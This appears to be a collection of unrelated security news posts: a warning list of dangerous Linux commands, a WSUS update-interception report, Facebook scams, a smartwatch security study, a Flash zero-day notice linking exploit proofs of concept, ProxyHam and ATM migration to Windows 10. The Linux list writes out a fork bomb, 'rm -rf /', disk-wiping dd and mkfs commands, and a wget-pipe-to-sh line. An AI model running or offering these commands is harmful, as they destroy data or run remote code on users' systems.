Linux shell or terminal commands are very powerful, and a single command can delete a folder, a set of files, or even the root filesystem. Linux never asks for confirmation; it executes the command right away, and you lose the useful data and information stored in those files and folders.

Take a look at the 9 commands and codes you should avoid executing.

1. Linux Fork Bomb Command

:(){ :|: & };: also known as the Fork Bomb is a denial-of-service attack against a Linux system. :(){ :|: & };: is a bash function that calls itself twice in the background. Once executed, it keeps spawning copies of itself until the system runs out of process slots and freezes.

To get rid of it you need to restart or reboot your server, so be careful before executing this command on your Linux shell.

2. Mv Folder /Dev/Null Command

mv folder /dev/null is another risky command. /dev/null, the null device, is a device file that discards all data written to it while reporting that the write succeeded. It is also known as the bit bucket or black hole.

3. Rm -Rf Command

The rm -rf command is used to delete a folder and its contents on a Linux system. If you don’t know how to use it, it is very dangerous to the system. The most common combinations and options used with rm -rf are listed below:

  • rm command is used to delete files on a Linux system.
  • rm -f command removes read-only files in a folder without prompting.
  • rm -r command deletes the contents of a folder recursively.
  • rm -d command is used to remove an empty directory, but it will refuse to remove a directory that is not empty.
  • rm -rf / command is used for forced deletion (it deletes even write-protected files) of all the content in the root directory and its sub-folders.
  • rm -rf * command is used for forced deletion of all the content in the current directory (the directory you are currently working in) and its sub-folders.
  • rm -rf . command is used for forced deletion of all the content in the current folder and its sub-folders. The rm -r .[^.]* command can also be used.
  • rm -i command is used for removal of files and folders, but a prompt will appear before each removal.

4. Mkfs Command

mkfs can be a dangerous command on your Linux-based system if you don’t know its purpose. Whatever device is named after mkfs will be formatted and its contents replaced by a blank Linux file system.

The commands below will format the hard drive and need administrator (root) privileges:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat
  • mkfs.cramfs (no administrator privileges needed)

5. Tar Bomb

The tar command is used to combine many files into a single archive file in .tar format. A Tape Archive (tar) bomb can be created with this command.

It is an archive file that, when untarred, explodes into thousands or millions of files with names similar to existing files, scattered into the current directory rather than into a new directory.

To avoid becoming the victim of a tar bomb, make a habit of creating a new protective directory whenever you receive a tar file, and move the received tar file into that directory before untarring it. If the tar file is indeed a tar bomb, you can simply remove the newly created directory to get rid of it.

Another way to avoid a tar bomb exploding is the -t option, which lists the contents of a tar file and gives you an idea of what it contains before you extract it.

6. Dd Command

The dd command is used to copy and convert raw data, including whole hard disk partitions. However, it can turn out to be harmful if you specify the wrong destination.

The command may be any one of these:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda
  • dd if=/dev/zero of=/dev/hda (will zero out the whole primary hard drive)

7. Shell Script Code

Someone may victimize you by giving you a link to a shell script and urging you to download and execute it. The script may contain malicious or dangerous code. The command may look like this: wget http://some_malicious_source -O- | sh. wget downloads the script and pipes it straight to sh, which executes it without you ever seeing its contents.

8. Malicious Source Code

Someone gives you source code and asks you to compile it. The code may appear normal, but malicious code can be disguised inside a large source tree and may harm your system. To avoid being victimized by this kind of attack, only accept and compile source code from trustworthy sources.

9. Decompression Bomb

You receive a compressed file and are asked to extract it. The file appears very small, perhaps only a few KB, but in fact it contains extremely highly compressed data.

Once the file is decompressed, hundreds of GB of data are extracted, which can fill up your hard drive and bring down the performance of your system.
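The tar -t listing advised for tar bombs and the size concern behind decompression bombs can be combined into one check that runs before anything is extracted. The following is an added example, not code from the article; it reads only the member headers of a .tar.gz, and the thresholds are assumptions chosen for illustration:

```python
import io
import os
import tarfile

# Thresholds are assumptions for this example, not figures from the article.
MAX_RATIO = 100         # declared bytes per compressed byte
MAX_TOTAL = 1 << 30     # 1 GiB of declared content


def inspect_tar(archive_bytes, max_ratio=MAX_RATIO, max_total=MAX_TOTAL):
    """Walk the member headers (what `tar -t` shows) without writing anything
    to disk and report the two risks described above."""
    top_level = set()
    unsafe_paths = []
    declared_total = 0
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tf:
        for member in tf:
            # Absolute paths or ".." components would escape the target dir.
            if os.path.isabs(member.name) or ".." in member.name.split("/"):
                unsafe_paths.append(member.name)
            top_level.add(member.name.split("/", 1)[0])
            declared_total += member.size  # header value, not inflated data
    ratio = declared_total / max(len(archive_bytes), 1)
    return {
        "scatters": len(top_level) > 1,   # tar bomb: no single root directory
        "unsafe_paths": unsafe_paths,
        "declared_total": declared_total,
        "ratio": ratio,
        "size_bomb": declared_total > max_total or ratio > max_ratio,
    }


def _add(tf, name, data):
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tf.addfile(info, io.BytesIO(data))


def build_bomb_sample(payload_size=4 << 20):
    """Constructed sample: files dumped at the archive root (tar-bomb layout)
    plus one member of 4 MiB of zeros that gzip shrinks to a few KB."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name in ("README", "Makefile", "main.c"):
            _add(tf, name, b"placeholder\n")
        _add(tf, "data.bin", b"\0" * payload_size)
    return buf.getvalue()


def build_safe_sample():
    """Constructed sample: everything lives under one directory, tiny content."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name in ("project/README", "project/main.c"):
            _add(tf, name, b"placeholder\n")
    return buf.getvalue()


if __name__ == "__main__":
    for label, data in (("bomb", build_bomb_sample()), ("safe", build_safe_sample())):
        print(label, inspect_tar(data))
```

Note that a gzip stream still has to be decompressed to reach each header, so the check costs CPU time, but nothing is written to disk and the declared sizes let you refuse the archive before extraction.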


If you think that the patches delivered through Windows Update cannot be laced with malware, think again.
Security researchers have shown that hackers could intercept Windows Update to deliver and inject malware into organizations.
Security researchers from UK-based security firm Context have discovered a way to exploit insecurely configured implementations of Windows Server Update Services (WSUS) in an enterprise.

What is WSUS in Windows?

Windows Server Update Services (WSUS) allows an administrator to deploy Windows software updates to servers and desktops throughout the organization.
Clients receive these updates from the WSUS server rather than directly from Microsoft’s update servers.
Once the updates are on the administrator’s server, the admin, as the owner of their distribution, can control which clients in the corporate environment may download and install them.

Intercepting WSUS to Inject Malware into Corporate Networks

By default, WSUS does not use SSL-encrypted HTTPS for its SOAP (Simple Object Access Protocol) XML web service. Instead, it uses unencrypted HTTP.
This is a major WSUS weakness that should no longer be ignored, at least now that it has been exploited and demonstrated to the world.
Because such WSUS installations are not configured to use SSL, they are vulnerable to man-in-the-middle (MitM) attacks.
According to researchers Paul Stone and Alex Chapman, the attack is so simple that a hacker with low privileges can set up fake updates that connected machines install automatically.
All update packages downloaded from the Microsoft Update website are signed with a Microsoft signature, which cannot be altered.
However, hackers can alter a Windows update by tampering with the update’s metadata.

“By repurposing existing Microsoft-signed binaries, we were able to demonstrate that an attacker can inject malicious updates to execute arbitrary commands,” researchers said in the paper.

A malicious attacker can inject malware into the SOAP XML communication between the WSUS server and the client, making it look like a purely authentic update to install.
Windows Update also includes more than 25,000 third-party drivers that are developed and signed by other developers, and these can also be altered easily.

Our concern is that when plugging in a USB device, some of these drivers may have vulnerabilities that could be exploited for malicious purposes. Everyone is familiar with the ‘searching for Drivers’ and ‘Windows Update’ dialog boxes on their desktops – but these seemingly innocuous windows may be hiding some serious threats.

So this can now be a big security threat for the new Windows 10. Either corporates keep living in the era of old Windows, or they upgrade and welcome the malware!
The researchers demonstrated the hack at the Black Hat security conference in Las Vegas this week in a talk titled, WSUSpect: Compromising the Windows Enterprise via Windows Update [PDF].

 


Big, popular sites with huge numbers of visitors are a hackers’ wonderland for posting scams. Users of social media websites in particular are prone to scams that then escalate into dangerous cyber attacks. Facebook has about 1.4 billion users, making it potentially the most active social media site for hackers.

These are some of the common Facebook scams that you might fall for if you haven’t already:

5) Viral Videos/ Scandals

The word “viral” has itself gone viral, and it makes you yearn to see the content inside. It could be anything from cute puppy videos to horrendous torture videos by terrorists. More popular among these viral videos are salacious celebrity scandals, which generally contain no video at all, just a link to another phishing website, or a demand to install an update or a plugin. Once you do that, the virus is installed on your system, and you know what happens next...

You will never get adult videos on any social media website, so if you happen to scroll through one on your home page, then it is definitely a Facebook scam.

4) Free Giveaways/Survey Scams

Nothing is free in this world, my friend. Especially not free travel tickets, and definitely not iPhones, iPads or Macs. Social media is full of spam offers that sound too good to be true and coax you as if you were the world’s luckiest person.

There are also survey scams that trick you into giving away your personal information in exchange for gift vouchers or free trips. Do not fall for these Facebook scams, and never forward them to your contacts either, or you will end up spamming your friends too.

3) Facebook Customization

If any link on your home page claims to change the layout or colour, give you a special “Dislike Button”, or add any special functionality, then it is probably another Facebook scam. You can’t change the official interface of the world’s biggest social media website by clicking a few phishing links.

These scams will either ask you to install their specific Facebook app or ask you to fill in a form describing what changes you want. Once in, they get full access to your data, or spread malware onto your system through phishing forms.

If Facebook ever wanted to give you customization features, it would make a grand announcement, not hide them behind a link. So be alert and steer clear of such Facebook scams.

2) Celebrity Friend Requests/Charity

This might not happen as frequently as the others, but when someone falls for this Facebook scam, it hits them very hard. You come across a friend request from a celebrity or from a so-called official page. Then they ask you to donate money for the poor or for people struck by disaster.

They will either ask for your credentials or tell you to donate directly through online payment services. Never trust such messages if you want to stay safe on Facebook.

1) Who Viewed My Profile?

This is the biggest and most pervasive Facebook scam ever. Facebook has made it pretty clear that there is no way any app can tell who has visited your profile and how many times. Any link or app that claims to do so is a scam.

In these scams, you have to hand over your information and accept their terms and conditions. This scam plays on the emotions of users, as most of us want to know whether a secret crush or an ex-partner visits us online.

The application does claim to tell you who viewed your profile based on an algorithm, but by then you have already been infected by the app and are under attack.

So avoid all these malicious and fraudulent apps and links to stay safe on social media. With this, we end the list of the biggest Facebook scams.

We will let you know if we come across any more such scams. You can also tell us, and the fossBytes community, if you happen to know of other scams.

Do you own a smartwatch? If yes, then how safe is it? There is an almost 100 percent chance that you own a vulnerable smartwatch.
Computer manufacturer Hewlett-Packard is warning users of smartwatches, including the Apple Watch and Samsung Gear, that their wearable devices are vulnerable to cyber attacks.
In a study, HP’s Fortify tested today’s top 10 smartwatches for security features such as basic data encryption and password protection, and for privacy concerns.
The most shocking part of the study was this:

Not even a Single Smartwatch Found to be 100 percent Safe

Security experts found that 100 percent of the wearable devices contained at least one serious security vulnerability that could expose the devices to hackers.
With the increasing adoption of smartwatches, manufacturers need to pay closer attention to customers’ security, because these wearable devices could potentially open the door to new threats to personal and sensitive information.

“As the adoption of Smartwatches accelerates, the platform will become vastly more attractive to those who would abuse that access, making it critical that we take precautions when transmitting personal data or connecting Smartwatches into corporate networks,” Jason Schmitt, general manager at HP’s Security Fortify said in a statement.

The study [PDF] almost certainly included smartwatches by Apple, Pebble, Samsung and Sony, since it claims to have picked the top 10 smartwatches.

Here’s the list of issues reported by HP:

1. Lack of transport encryption – Though all products implemented transport encryption using SSL/TLS, 40 percent of devices were found to be either vulnerable to the POODLE attack, allowing the use of weak ciphers, or still using SSL v2.
2. Insecure interfaces – Three out of ten smartwatches used cloud-based web interfaces, and all of them were vulnerable to account harvesting. They allowed unlimited login attempts, helping hackers guess passwords.
3. Insufficient user authentication/authorization – Three out of ten smartwatches completely failed to offer two-factor authentication or the ability to lock accounts after 3 to 5 failed password attempts.
4. Insecure software/firmware – 7 out of 10 smartwatches had issues with firmware updates. The wearable devices often did not receive encrypted firmware updates; many updates were signed, which helps prevent malicious firmware from being installed, but the lack of encryption still allowed the update files to be downloaded and analyzed.
5. Privacy concerns – Smartwatches also pose a risk to personal security as well as privacy. All the tested devices collected some form of personal information, including username, address, date of birth, gender, heart rate, weight and other health information.
HP said it would not disclose the names of the smartwatch manufacturers whose watches it had tested, but that it is working with vendors to “build security into their products before they put them out to market.”
Meanwhile, HP urges users not to connect their smartwatches to sensitive access control functions, like cars or homes, unless strong authorization is offered.
Recommendations

HP has the following recommendations for those looking to use or produce smartwatch devices in a more secure manner:

Consumer

  • Do not enable sensitive access control functions (e.g., car or home access) unless strong authentication is offered (two-factor etc.).
  • Enable passcode functionality to prevent unauthorized access to your data, opening of doors, or payments on your behalf.
  • Enable security functionality (e.g., passcodes, screen locks, two-factor and encryption).
  • For any interface such as mobile or cloud applications associated with your watch, ensure that strong passwords are used.
  • Do not approve any unknown pairing requests (to the watch itself).

Enterprise Technical Teams

  • Ensure TLS implementations are configured and implemented properly.
  • Protect user accounts and sensitive data by requiring strong passwords.
  • Implement controls to prevent man-in-the-middle attacks.
  • Build mobile applications (specific to each ecosystem) into the device – in addition to any vendor-provided or recommended apps.

Yet another Flash zero-day was released last night; again, this exploit comes from the data hackers obtained by breaching ‘The Hacking Team’.

Previous issue: CVE-2015-5119, which affected Adobe Flash Player versions 9.0 through 18.0.0.194.

All the data obtained from this breach has been made available on a mirror site: https://ht.transparencytoolkit.org, and now WikiLeaks (https://wikileaks.org/hackingteam/emails/emailid/45977) has also uploaded this data and made it easier to investigate by allowing users to search for keywords.

I would think there could also be more on the way!

New Zero-Day: CVE-2015-5122

Affected software versions

Adobe Flash Player 18.0.0.203 and earlier versions for Windows and Macintosh
Adobe Flash Player 18.0.0.204 and earlier versions for Linux installed with Google Chrome
Adobe Flash Player Extended Support Release version 13.0.0.302 and earlier 13.x versions for Windows and Macintosh
Adobe Flash Player Extended Support Release version 11.2.202.481 and earlier 11.x versions for Linux

Adobe Security Bulletin

https://helpx.adobe.com/security/products/flash-player/apsa15-04.html

WikiLeaks Reference – New Zero-Day

https://wikileaks.org/hackingteam/emails/emailid/45977

Link to the New POC

http://pastebin.com/QiMumzqx

Link to the Old POC

http://pastebin.com/CcJQRxhy

POC

When the public PoC is run in the browser, the exploit opens calc.exe on Windows.

Picture compliments of @dummys1337


It’s dubbed ProxyHam, and it’s a ‘hardware proxy’ that lets users connect to a distant public WiFi network over hard-to-trace low-frequency radio channels. It is comprised of a WiFi-enabled Raspberry Pi along with three antennas. One antenna connects to a public WiFi network at a public place such as a Starbucks or McDonald’s. The other two antennas are set up between the WiFi hotspot and you and are used to relay the WiFi signal at 900 MHz. By relaying over a 900 MHz radio link, ProxyHam effectively connects to a far-away WiFi network from a range of between 1 and 2.5 miles, depending on interference.

Caudill will unveil ProxyHam at the Def Con hacker conference in Las Vegas next month. Caudill also said that he and his colleagues are working on additional features, like a self-destruct function and hiding the ProxyHam inside objects such as books.

The ProxyHam is going to sell for around $200 (£130) and will eventually be able to drop to $150 (£95).

You can read more about the ProxyHam here: motherboard.vice.com


The ATM Industry Association (ATMIA) has declared that its next major migration to a Windows ATM operating system will be to Windows 10, bypassing Windows 8. With the announcement, it is clear that ATMs running older versions of Windows will be upgraded to Windows 10 once the OS becomes available.

Windows 10 for ATMs

The main reasons advertised for adopting this migration path are the increased security against malware and other forms of cyber-attack offered by Windows 10, and a cost-to-benefit analysis that establishes a strong business case for the migration strategy.

Some other benefits of migrating from Windows XP, Windows 7 or Windows CE to Windows 10 are:

  • Microsoft’s new philosophy of one system for all, “a single Windows for everything”
  • Overcoming the previous disadvantages of Windows 8
  • Availability of periodic updates, like service packs, etc.

ATMIA CEO Mike Lee had the following to say on the planned migration process:

“ATM deployers should start their 2020 migration without delay as ATM hardware purchased now will still be in use when support for Windows 7 OS ends in that year. This means terminals would need to be upgradeable and compatible with the next big operating system. It’s important to know which ATM configurations are going to be Windows 10 compatible.”

“We expect there to be some parallel trajectories in future with a mainstream solution adopted by the majority of deployers, probably Windows 10 in our view, and alternative systems like Linux and Android,” he further added.

This means ATMIA will continue to explore and discuss alternative operating systems in its Next Generation ATM Architecture Committee.

The ATM Industry Association is a non-profit trade association serving all businesses and groups in the ATM industry. The association is made up of over 5,000 members in 65 countries and represents well over 1.5 million ATMs internationally.